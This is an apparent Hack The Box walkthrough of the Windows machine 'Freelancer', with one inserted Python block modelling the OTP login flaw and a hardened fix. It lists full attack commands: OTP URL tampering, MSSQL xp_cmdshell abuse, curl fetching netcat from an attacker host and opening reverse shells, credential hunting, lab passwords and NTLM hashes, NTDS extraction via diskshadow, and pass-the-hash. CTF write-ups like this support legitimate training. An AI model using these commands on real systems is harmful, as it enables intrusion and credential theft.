Freelancer

OS: Windows
Difficulty: Hard
Points: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.64.53 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV -oN nmap.txt 10.129.64.53
Nmap scan report for 10.129.64.53
Host is up (0.21s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-02 06:54:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
64416/tcp open  msrpc         Microsoft Windows RPC
64420/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

First we create a user as an employer.

If we try to log in we cannot, but it is possible to reset the password in order to get in.

Now we can authenticate as the employer, and there is an interesting section called QR-Code.

Enum users

Digging a little, we can enumerate users.

GET /accounts/profile/visit/2/ HTTP/1.1
Host: freelancer.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://freelancer.htb/blog/details/?article_id=12
Connection: keep-alive
Cookie: csrftoken=FbxM5FKMdMudJohQpDrOidxNglAqNQA3; sessionid=hdp9xfqeo26c907yf6jbaktqbktpkqh1
Upgrade-Insecure-Requests: 1

We see that the admin user has ID 2.

http://freelancer.htb/accounts/profile/visit/2/

QR code

If we scan the QR code we get a URL that we can use to authenticate without a password.

http://freelancer.htb/accounts/login/otp/MTAwMTI=/a89aef23f0b7a95b8d37a2fe580e3f82/

The MTAwMTI= part of the URL is base64; decoding it gives our user number, 10012.

Admin access

We copy the OTP code from the QR and modify the URL to access the admin account. We log out of our current user and browse to the following URL.

http://freelancer.htb/accounts/login/otp/Mg==/191c10c32ed0b19bc84a85b8056fc8d9/

Now we are inside the admin account.

We can access the following portal.

http://freelancer.htb/admin/
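The login-link flaw used above, modelled in Python as an added example (not code from the original writeup or from the Freelancer application): the weak scheme checks the OTP on its own and trusts the base64 user id in the URL, so one user's OTP combined with another id logs in as that other user, while the hardened scheme binds the token to the user id and an expiry with an HMAC, so a swapped id fails verification. The server key, URL layout, function names and the in-memory store are assumptions for the demonstration.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Assumption: a server-side secret for the hardened scheme (constructed, not from the page).
SERVER_KEY = b"constructed-demo-key-change-me"

def b64_id(user_id: int) -> str:
    """Encode the numeric user id the way the page's URL does (10012 -> 'MTAwMTI=')."""
    return base64.b64encode(str(user_id).encode()).decode()

def swap_id(path: str, new_user_id: int) -> str:
    """Model the tampering step from the walkthrough: keep the token, replace the user id."""
    prefix, _enc_id, token = path.rstrip("/").rsplit("/", 2)
    return f"{prefix}/{b64_id(new_user_id)}/{token}/"

# --- Weak scheme (models the behaviour the walkthrough abuses) ---
weak_store: Dict[str, int] = {}  # otp -> user id it was issued for (constructed store)

def weak_issue(user_id: int) -> str:
    otp = secrets.token_hex(16)
    weak_store[otp] = user_id
    return f"/accounts/login/otp/{b64_id(user_id)}/{otp}/"

def weak_login(path: str) -> Optional[int]:
    _prefix, enc_id, otp = path.rstrip("/").rsplit("/", 2)
    if otp not in weak_store:
        return None
    # Defect: the identity is taken from the URL, not from the record the OTP was issued to.
    return int(base64.b64decode(enc_id))

# --- Hardened scheme: token = expiry + HMAC(key, user_id:expiry), so the id is signed ---
def strong_issue(user_id: int, now: int, ttl: int = 300) -> str:
    """Issue a short-lived link whose token covers both the user id and the expiry."""
    exp = now + ttl
    mac = hmac.new(SERVER_KEY, f"{user_id}:{exp}".encode(), hashlib.sha256).hexdigest()
    return f"/accounts/login/otp/{b64_id(user_id)}/{exp}.{mac}/"

def strong_login(path: str, now: int) -> Optional[int]:
    _prefix, enc_id, token = path.rstrip("/").rsplit("/", 2)
    exp_s, mac = token.split(".", 1)
    user_id = int(base64.b64decode(enc_id))
    if int(exp_s) < now:
        return None  # expired link
    expected = hmac.new(SERVER_KEY, f"{user_id}:{exp_s}".encode(), hashlib.sha256).hexdigest()
    # A swapped user id changes the signed data, so the MAC no longer verifies.
    return user_id if hmac.compare_digest(mac, expected) else None
```

In production the hardened token should also be single-use (stored and consumed on first login) so a captured link cannot be replayed within its lifetime.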

MSSQL Impersonate

We can impersonate the sa user to execute commands. We verify that this is possible with the following query.

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
sa

We enable xp_cmdshell to execute system commands.

EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options','1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell','1';
RECONFIGURE;

EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "net user"

Reverse Shell

We run the following query to get a reverse shell.

EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "mkdir c:\temp"
EXEC xp_cmdshell "curl 10.10.14.18/nc64.exe -o c:\temp\nc.exe"
EXEC xp_cmdshell "c:\temp\nc.exe 10.10.14.18 1234 -e cmd.exe"

Lateral Movement

We search the filesystem for files containing passwords.

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\Resources\1033\sqlcm.xml
Program Files (x86)\Microsoft SQL Server\150\Tools\PowerShell\Modules\SQLPS\en\Microsoft.SqlServer.Management.PSSnapins.dll-Help.xml
Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
Windows\Panther\MigLog.xml
Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_acb6d904135c6a14\Amd64\MSIPP.xml

Inside the following file we find a pair of passwords.

type Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"

The following credentials work to connect.

┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# crackmapexec smb 10.129.216.84 -u 'mikasaAckerman' -p 'IL0v3ErenY3ager'
SMB         10.129.216.84   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.129.216.84   445    DC               [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager

We get a reverse shell with the RunasCs.exe tool.

https://github.com/antonioCoco/RunasCs

RunasCs.exe mikasaAckerman IL0v3ErenY3ager "C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe" -t 0

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-539d8$\Default
[+] Async process 'C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe' with pid 4396 created in background.
┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# nc -lvnp 6666           
listening on [any] 6666 ...
connect to [10.10.14.18] from (UNKNOWN) [10.129.216.84] 59496
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
freelancer\mikasaackerman

Privilege Escalation

Inside the directory c:\Users\mikasaAckerman\Desktop we find 2 files.

c:\Users\mikasaAckerman\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8954-28AE

 Directory of c:\Users\mikasaAckerman\Desktop

05/28/2024  10:22 AM    <DIR>          .
05/28/2024  10:22 AM    <DIR>          ..
10/28/2023  06:23 PM             1,468 mail.txt
10/04/2023  01:47 PM       292,692,678 MEMORY.7z
06/02/2024  12:09 PM                34 user.txt

We download the file.

nc -lvnp 7777 > MEMORY.7z
c:\temp\nc.exe -w 700 10.10.14.18 7777 < MEMORY.7z

Analyzing DMP File

We use the following tool, in its Windows version, to mount MEMORY.DMP.

https://github.com/ufrisk/MemProcFS

MemProcFS.exe -device MEMORY.DMP -forensic 0

Once mounted, we look for the SYSTEM, SAM and SECURITY hive files.

M:\registry\hive_files

Now that we have the files, we use impacket to extract the information.

impacket-secretsdump  -system 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive -sam 0xffffd3067d935000-SAM-MACHINE_SAM.reghive -security 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive LOCAL
[*] _SC_MSSQL$DATA 
(Unknown User):PWN3D#l0rr@Armessa199
[*] Cleaning up...

The password we obtained works for the user lorra199.

crackmapexec smb 10.129.185.251 -u users.txt -p 'PWN3D#l0rr@Armessa199' --continue
SMB         10.129.185.251  445    DC               [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199

BloodHound Enum

Using BloodHound we can enumerate the AD objects.

python3 /opt/BloodHound.py/bloodhound.py -u 'mikasaAckerman' -p 'IL0v3ErenY3ager' -d freelancer.htb -c all -ns 10.129.216.84
INFO: Found AD domain: freelancer.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.freelancer.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 8 computers
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 30 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SetupMachine.freelancer.htb
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: Datacenter-2019
INFO: Querying computer: DC.freelancer.htb
WARNING: Could not resolve: Datacenter-2019: The resolution lifetime expired after 3.115 seconds: Server Do53:10.129.216.84@53 answered The DNS operation timed out.
INFO: Done in 00M 32S

The user lorra199 has the GenericWrite privilege over the AD Recycle Bin group.

We get a reverse shell.

RunasCs.exe lorra199 'PWN3D#l0rr@Armessa199' "C:\temp\nc.exe 10.10.14.47 7777 -e cmd.exe" -t 0
┌──(root㉿kali)-[/opt/windows]
└─# nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.47] from (UNKNOWN) [10.129.185.251] 60453
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
freelancer\lorra199

Using the following command we can see which objects are deleted and can be recovered.

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

We see the user liza.kazanof, who belongs to the Remote Management Users and Backup Operators groups. We can restore the user as follows.

Restore-ADObject -Identity "ebe15df5-e265-45ec-b7fc-359877217138" -NewName "lkazanof_tmp"

We check that the user was restored.

crackmapexec winrm 10.129.185.251 -u liza.kazanof -p 'RockYou!'
SMB         10.129.185.251  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:freelancer.htb)
HTTP        10.129.185.251  5985   DC               [*] http://10.129.185.251:5985/wsman
WINRM       10.129.185.251  5985   DC               [+] freelancer.htb\liza.kazanof:RockYou! (Pwn3d!)

Liza's password was obtained using the following resource (WinDbg and mimikatz): https://diverto.hr/en/blog/en-2019-11-05-Extracting-Passwords-from-hiberfil-and-memdumps/

Backup Operators

This user belongs to the Backup Operators group, so we can use it to escalate privileges.

evil-winrm -i 10.129.185.251 -u liza.kazanof -p 'RockYou!'
*Evil-WinRM* PS C:\Users\liza.kazanof\Documents> net user liza.kazanof
User name                    liza.kazanof
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/14/2024 6:37:29 PM
Password expires             6/25/2024 6:37:29 PM
Password changeable          5/15/2024 6:37:29 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

We create a shadow copy of the disk as follows.

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append 
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt

We copy the required files.

robocopy /b Z:\Windows\System32\Config C:\temp SAM
robocopy /b Z:\Windows\System32\Config C:\temp SYSTEM
robocopy /b Z:\Windows\NTDS C:\temp ntds.dit

We download them.

download ntds.dit
download SAM
download SYSTEM

Now we dump the hashes from the files.

impacket-secretsdump -system SYSTEM -sam SAM -ntds ntds.dit LOCAL
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::

With this we can pass-the-hash and get Administrator.

evil-winrm -i 10.129.185.251 -u Administrator -H 0039318f1e8274633445bce32ad1a290